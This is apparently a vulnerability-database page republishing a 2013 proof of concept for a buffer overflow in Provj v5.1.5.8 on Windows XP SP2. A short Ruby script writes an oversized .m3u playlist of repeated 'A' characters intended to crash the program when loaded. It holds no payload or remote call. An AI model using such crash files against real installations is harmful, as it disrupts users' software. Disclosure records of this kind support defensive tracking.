Lucene search
+L

Provj 5.1.5.8 Buffer Overflow

🗓️ 12 Nov 2013 00:00:00Reported by Necmettin COSKUNType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Provj v5.1.5.8 Buffer Overflow PoC, Exploit for windows XP sp2

Code
`#!/usr/bin/env ruby  
# coding:UTF-8  
# Exploit Title:Provj v5.1.5.8 Buffer Overflow (Poc)  
# Author:Necmettin COSKUN => twitter.com/babayarisi  
# Vendor :http://www.clubdjpro.com  
# Software link:http://www.clubdjpro.com/files/provj5.exe  
# version: v5.1.5.8  
# Tested on: windows XP sp2  
  
puts "1.Start Program With Trial Mode"  
puts "2.Load Playlist .m3u"  
puts "3.Don't be evil"  
  
KESST = "A" * 5800  
  
File.open('poj.m3u', 'w') do |bofdosya|   
bofdosya.puts (KESST)  
bofdosya.close()  
end  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Nov 2013 00:00Current
1.1Low risk
Vulners AI Score1.1
16